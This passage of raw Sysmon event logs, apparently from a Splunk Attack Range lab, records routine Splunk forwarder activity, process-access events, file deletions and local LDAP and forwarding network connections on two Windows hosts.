Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.239{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9240FF4F509559FD3AEC560971763F4D,SHA256=81A8457449FEF179C5FEE95A03B293863CF8714646E863D7306B65DEC2C2F0F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.161{C8EA50B7-0F02-6216-BA04-000000003802}2176300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F02-6216-BA04-000000003802}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0F02-6216-BA04-000000003802}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.005{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F02-6216-BA04-000000003802}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.006{C8EA50B7-0F02-6216-BA04-000000003802}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:03.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62F5CCDC0B25F4528FAC09C0F92B0136,SHA256=290C2C217282498985CED479772638F823CB67CA2E9E8843605DC029B0411F93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:03.255{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0636CAB990E7E86557E45CFD199B211B,SHA256=CB1E5D7937788EE54D66DEEBEBC4A470E2F3A4359EB65F978BDAD9E65E166D63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:00.649{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51213-false10.0.1.12-8000- 23542300x8000000000000000285653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:03.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=743F77D6842CBC5EB3D4C7F5E96AC50F,SHA256=02B59B8D48ABAE687EE57E28836A48D7C8EDC4F224C10DCEF70867A741139EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:03.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E2BF5340F4905530D5E7B15185426EE,SHA256=20B4A61A507D8B4FE21CB56894CE2016D3A3CB14BA5FA0861E7BF24B569A1130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:04.990{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D70021952CF54FDEB1D1CEEEF68F72,SHA256=5FF6BF4C23093DCA3470872B3CC1927650CB480FC208B118870C67BD13F8F894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.646{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=743F77D6842CBC5EB3D4C7F5E96AC50F,SHA256=02B59B8D48ABAE687EE57E28836A48D7C8EDC4F224C10DCEF70867A741139EA0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F04-6216-BC04-000000003802}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F04-6216-BC04-000000003802}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F04-6216-BC04-000000003802}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.302{C8EA50B7-0F04-6216-BC04-000000003802}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:04.270{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C265F72A13F1E130D4107FFB5F69208,SHA256=D0196094811BB4A05332BD5C137C33C8B633003F8A3A16B9676391B425728806,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:05.286{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=277EBFA7FD6A8D50A5486510E78C9981,SHA256=D5EB75B1572FC4D033526152F4C7744468443CE1602741A630FE0707592F8864,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:03.121{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53276-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:03.121{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53276-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.652{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53275-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:06.302{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F95B3E84E4F3C41CE807475B720FB9E3,SHA256=7FE60154063AC0E6A0701CDFB55444A5D243A9A4BCA6EFAD499BF2EE8D6F1D23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:06.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED9EBA7819DC9EAAC8D1B935FF703AD,SHA256=45BDE014D77A82C049352D138AC82591765CEA47812D01CBF995603AAD38F7CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:07.317{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD6588A01E8A1289B7B04AA3B72E399,SHA256=E5E51A3474107C989C735A59F05BF1BFDEAA8E7FFAA57A4CCCA81D853C519006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:07.240{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79068F1220051CDF12149B9132237499,SHA256=8AD4994292C47E23BBD719FB7AE1AEDC2F3064222BE77F3C85D0ED87E6313490,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:08.333{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04B2AD7493E8147AFF524C60A7EEAE45,SHA256=973ABE0AD16F4D5B2146CDDC5BC6B680A433ABA7902CCD781E9BD4A9769722BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:08.271{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D73834F3E389A45162305E2274DD1EB2,SHA256=7787E3A74BE6C8C9BAEE975624AAA8141530723FE16BAFC70AEBA762AC221169,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:06.664{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51214-false10.0.1.12-8000- 23542300x8000000000000000214816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:09.303{4F8D34B0-F133-6215-6C00-000000003902}2564NT 